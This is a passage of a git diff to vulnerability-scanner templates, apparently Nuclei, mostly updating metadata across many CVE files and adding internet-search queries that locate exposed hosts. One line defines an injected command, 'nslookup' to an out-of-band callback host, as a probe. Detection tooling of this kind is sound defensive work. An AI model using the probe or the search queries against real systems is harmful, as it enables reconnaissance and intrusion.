+ google-query: intitle:"manageengine" tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp variables: cmd: 'nslookup {{interactsh-url}}' diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 0128412d08..9eb86b1a78 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -20,14 +20,14 @@ info: cvss-score: 9.8 cve-id: CVE-2022-47986 cwe-id: CWE-502 - epss-score: 0.9223 - epss-percentile: 0.98769 - cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:* + epss-score: 0.95924 + epss-percentile: 0.99459 + cpe: cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: ibm - product: aspera_faspex + vendor: linux + product: linux_kernel shodan-query: html:"Aspera Faspex" tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 3ddb48c252..61a7b5fd56 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -28,6 +28,8 @@ info: vendor: opencats product: opencats shodan-query: title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated http: diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 7684a3ebc6..ccbc0f2b32 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -30,6 +30,7 @@ info: vendor: wavlink product: wl-wn530h4_firmware shodan-query: http.favicon.hash:-1350437236 + fofa-query: icon_hash=-1350437236 tags: cve2022,cve,wavlink,router,exposure http: diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index bf7df1101d..5871dedba4 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-48197 cwe-id: CWE-79 - epss-score: 0.0012 - epss-percentile: 0.45243 + epss-score: 0.00421 + epss-percentile: 0.74161 cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: yui_project product: yui shodan-query: html:"bower_components/yui2/" + fofa-query: body="bower_components/yui2/" tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project http: diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 15c127aa44..4dc3cc0ba6 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f - https://nvd.nist.gov/vuln/detail/CVE-2022-4897 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4897 cwe-id: CWE-79 - epss-score: 0.00289 - epss-percentile: 0.65597 + epss-score: 0.00486 + epss-percentile: 0.75995 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 8528e84fbe..0a29570785 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -13,13 +13,15 @@ info: - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8 - https://wordpress.org/plugins/simple-urls/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0099 + - http://packetstormsecurity.com/files/176983/WordPress-Simple-URLs-Cross-Site-Scripting.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0099 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32657 + epss-score: 0.00109 + epss-percentile: 0.43829 cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: getlasso product: simple_urls framework: wordpress - tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso + tags: wpscan,packetstorm,cve,cve2023,xss,simple-urls,authenticated,wordpress,wp,wp-plugin,getlasso http: - raw: diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index abfe116aa8..3d15ba075e 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -21,15 +21,17 @@ info: cvss-score: 7.5 cve-id: CVE-2023-0126 cwe-id: CWE-22 - epss-score: 0.34658 - epss-percentile: 0.96997 - cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:* + epss-score: 0.29128 + epss-percentile: 0.96882 + cpe: cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: sonicwall - product: sma1000_firmware + product: sma1000 shodan-query: title:"Appliance Management Console Login" + fofa-query: title="appliance management console login" + google-query: intitle:"appliance management console login" tags: cve2023,cve,sonicwall,lfi,sma1000 http: diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index 62bb1475b4..b001cae206 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -7,7 +7,7 @@ info: description: | The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains. remediation: Fixed in 1.9.1 - reference: | + reference: |- - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/ - https://github.com/im-hanzou/EVCer - https://github.com/nomi-sec/PoC-in-GitHub @@ -17,13 +17,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-0159 - epss-score: 0.00199 - epss-percentile: 0.56869 + epss-score: 0.01059 + epss-percentile: 0.84061 cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:* metadata: vendor: wprealize product: extensive_vc_addons_for_wpbakery_page_builder framework: wordpress + shodan-query: http.html:/wp-content/plugins/extensive-vc-addon/ + fofa-query: body=/wp-content/plugins/extensive-vc-addon/ publicwww-query: "/wp-content/plugins/extensive-vc-addon/" tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index b5fbe5c507..883795acfc 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-0236 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45193 + epss-percentile: 0.46131 cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,9 @@ info: vendor: themeum product: tutor_lms framework: wordpress + shodan-query: http.html:/wp-content/plugins/tutor/ + fofa-query: body=/wp-content/plugins/tutor/ + publicwww-query: /wp-content/plugins/tutor/ tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum http: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 9407993ab9..43fd326232 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0297 cwe-id: CWE-94 - epss-score: 0.35807 - epss-percentile: 0.96764 + epss-score: 0.50964 + epss-percentile: 0.97545 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: pyload product: pyload shodan-query: html:"pyload" + fofa-query: title="login - pyload" + google-query: intitle:"login - pyload" zoomeye-query: app:"pyLoad" tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast variables: diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index f690848cd6..d43bf8dfa8 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0334 cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.40094 + epss-score: 0.00119 + epss-percentile: 0.46131 cpe: cpe:2.3:a:shortpixel:shortpixel_adaptive_images:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: shortpixel product: shortpixel_adaptive_images framework: wordpress + shodan-query: http.html:/wp-content/plugins/shortpixel-adaptive-images/ + fofa-query: body=/wp-content/plugins/shortpixel-adaptive-images/ publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/ tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 3f52acf9d1..b06b0d9466 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -12,13 +12,15 @@ info: reference: - https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256 - https://nvd.nist.gov/vuln/detail/CVE-2023-0448 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/JoshuaMart/JoshuaMart classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-0448 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32657 + epss-score: 0.00119 + epss-percentile: 0.46131 cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +28,8 @@ info: vendor: matbao product: wp_helper_premium framework: wordpress + shodan-query: http.html:/wp-content/plugins/wp-helper-lite + fofa-query: body=/wp-content/plugins/wp-helper-lite publicwww-query: "/wp-content/plugins/wp-helper-lite" tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index 98d83b6ae2..a6397dc7fa 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0514 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29003 + epss-score: 0.0011 + epss-percentile: 0.44066 cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index 526013cd9d..bb322b34f6 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0527 cwe-id: CWE-79 - epss-score: 0.00228 - epss-percentile: 0.6097 + epss-score: 0.0047 + epss-percentile: 0.75559 cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index ac4799a04d..b8a8f23572 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-0552 cwe-id: CWE-601 epss-score: 0.00092 - epss-percentile: 0.37956 + epss-percentile: 0.39168 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index 64a16cf314..db415f56ad 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-0562 cwe-id: CWE-89 epss-score: 0.02218 - epss-percentile: 0.89242 + epss-percentile: 0.89478 cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 5cf087ab03..47c6487754 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0600 cwe-id: CWE-89 - epss-score: 0.02396 - epss-percentile: 0.89644 + epss-score: 0.04071 + epss-percentile: 0.92114 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,9 @@ info: vendor: plugins-market product: wp_visitor_statistics framework: wordpress + shodan-query: http.html:"wp-stats-manager" fofa-query: body="wp-stats-manager" + google-query: inurl:"/wp-content/plugins/wp-stats-manager" public-www: /wp-content/plugins/wp-stats-manager/ tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market variables: diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index e53dffbe2e..b4d0cd6150 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0602 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26204 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 2dfa76c78a..c9a9a6e5fd 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-0630 cwe-id: CWE-89 - epss-score: 0.05275 - epss-percentile: 0.92293 + epss-score: 0.09092 + epss-percentile: 0.94617 cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 5cfa80b391..c12d836bf2 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0669 cwe-id: CWE-502 - epss-score: 0.96954 - epss-percentile: 0.99709 + epss-score: 0.96969 + epss-percentile: 0.99729 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: fortra product: goanywhere_managed_file_transfer shodan-query: http.favicon.hash:1484947000 + fofa-query: app="goanywhere-mft" + zoomeye-query: app:"fortra goanywhere-mft" tags: cve2023,cve,rce,goanywhere,oast,kev,fortra http: diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index 492f3fd699..a3ecfa1573 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -13,11 +13,14 @@ info: cvss-score: 5.3 cve-id: CVE-2023-0678 cwe-id: CWE-862 + epss-score: 0.02274 + epss-percentile: 0.8962 cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* metadata: vendor: phpipam product: phpipam shodan-query: html:"phpIPAM IP address management" + fofa-query: body="phpipam ip address management" tags: cve,cve2023,php,phpipam,unauth http: diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 70a8fa58fe..067525648f 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-0900 cwe-id: CWE-89 - epss-score: 0.00947 - epss-percentile: 0.82798 + epss-score: 0.01291 + epss-percentile: 0.85797 cpe: cpe:2.3:a:wpdevart:pricing_table_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: wpdevart product: pricing_table_builder framework: wordpress + shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite + fofa-query: body=wp-content/plugins/ap-pricing-tables-lite publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" tags: cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index e882c0a3ab..2022d1e92d 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0942 cwe-id: CWE-79 - epss-score: 0.0049 - epss-percentile: 0.7561 + epss-score: 0.00445 + epss-percentile: 0.74926 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 69843c26b2..1562c76f9c 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-0947 cwe-id: CWE-22 - epss-score: 0.0114 - epss-percentile: 0.84427 + epss-score: 0.01537 + epss-percentile: 0.87078 cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.favicon.hash:-1189292869 + fofa-query: body="flatpress" tags: cve,cve2023,huntr,lfi,flatpress,listing http: diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 39f153eda8..1066b76c09 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0948 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29003 + epss-score: 0.00085 + epss-percentile: 0.36042 cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 16ff8ebd50..f011262b94 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-0968 cwe-id: CWE-79 - epss-score: 0.00229 - epss-percentile: 0.61047 + epss-score: 0.00262 + epss-percentile: 0.65937 cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 9acbdeec07..ba432b2d8a 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1020 cwe-id: CWE-89 - epss-score: 0.05497 - epss-percentile: 0.93034 + epss-score: 0.04365 + epss-percentile: 0.92346 cpe: cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 9a7d4ce305..5308f6b506 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1080 cwe-id: CWE-79 - epss-score: 0.0025 - epss-percentile: 0.64332 + epss-score: 0.00262 + epss-percentile: 0.65937 cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index dd02c9198b..6030f84805 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1177 cwe-id: CWE-29,CWE-22 - epss-score: 0.02668 - epss-percentile: 0.89327 + epss-score: 0.03032 + epss-percentile: 0.9095 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects http: diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 3ff851d678..25f19d2e58 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -27,6 +27,8 @@ info: vendor: niteothemes product: coming_soon_\&_maintenance framework: wordpress + shodan-query: http.html:/wp-content/plugins/cmp-coming-soon-maintenance/ + fofa-query: body=/wp-content/plugins/cmp-coming-soon-maintenance/ publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index d50e1cf238..e7c3986772 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1362 cwe-id: CWE-1021 - epss-score: 0.00421 - epss-percentile: 0.71594 + epss-score: 0.00134 + epss-percentile: 0.48533 cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 1bef666e4f..5b16ee7d47 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -24,6 +24,8 @@ info: vendor: video_list_manager_project product: video_list_manager framework: wordpress + shodan-query: http.html:/wp-content/plugins/video-list-manager/ + fofa-query: body=/wp-content/plugins/video-list-manager/ publicwww-query: /wp-content/plugins/video-list-manager/ tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 475f7f3a27..13e02aa8e0 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -30,6 +30,7 @@ info: vendor: jeecg product: jeecg-boot shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,sqli http: diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index ea5d2f901e..85951132a0 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2023-1496 cwe-id: CWE-79 - epss-score: 0.00085 - epss-percentile: 0.34963 + epss-score: 0.00091 + epss-percentile: 0.39059 cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 9197a040a0..1c2ba9143e 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1546 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29221 + epss-score: 0.00087 + epss-percentile: 0.36792 cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index b2c83a3a55..c619736526 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1671 cwe-id: CWE-77 - epss-score: 0.96156 - epss-percentile: 0.99469 + epss-score: 0.96909 + epss-percentile: 0.99711 cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: web_appliance shodan-query: title:"Sophos Web Appliance" fofa-query: title="Sophos Web Appliance" + google-query: intitle:"sophos web appliance" tags: cve2023,cve,packetstorm,rce,sophos,oast,kev http: diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 905690f7d5..01496b488e 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -21,14 +21,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1698 cwe-id: CWE-78 - epss-score: 0.55051 - epss-percentile: 0.97591 + epss-score: 0.90792 + epss-percentile: 0.98828 cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wago product: compact_controller_100_firmware shodan-query: html:"/wbm/" html:"wago" + fofa-query: body="/wbm/" html:"wago" tags: cve2023,cve,wago,rce http: diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index 7dff6c4314..f46619f25a 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1719 cwe-id: CWE-665 - epss-score: 0.02807 - epss-percentile: 0.90415 + epss-score: 0.02754 + epss-percentile: 0.90563 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,7 @@ info: vendor: bitrix24 product: bitrix24 shodan-query: html:"/bitrix/" + fofa-query: body="/bitrix/" tags: cve2023,cve,bitrix,xss,bitrix24 http: diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index cdb9c8fcc3..f48e1c9796 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 - epss-score: 0.05497 - epss-percentile: 0.93034 + epss-score: 0.04365 + epss-percentile: 0.92346 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index f57c2fb70a..588fb35ccd 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1780 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.2903 + epss-percentile: 0.30482 cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: codeermeneer product: companion_sitemap_generator framework: wordpress + shodan-query: http.html:/wp-content/plugins/companion-sitemap-generator/ + fofa-query: body=/wp-content/plugins/companion-sitemap-generator/ publicwww-query: "/wp-content/plugins/companion-sitemap-generator/" tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 074ffba78d..fa2ae0923a 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -28,6 +28,9 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ + publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms http: diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index 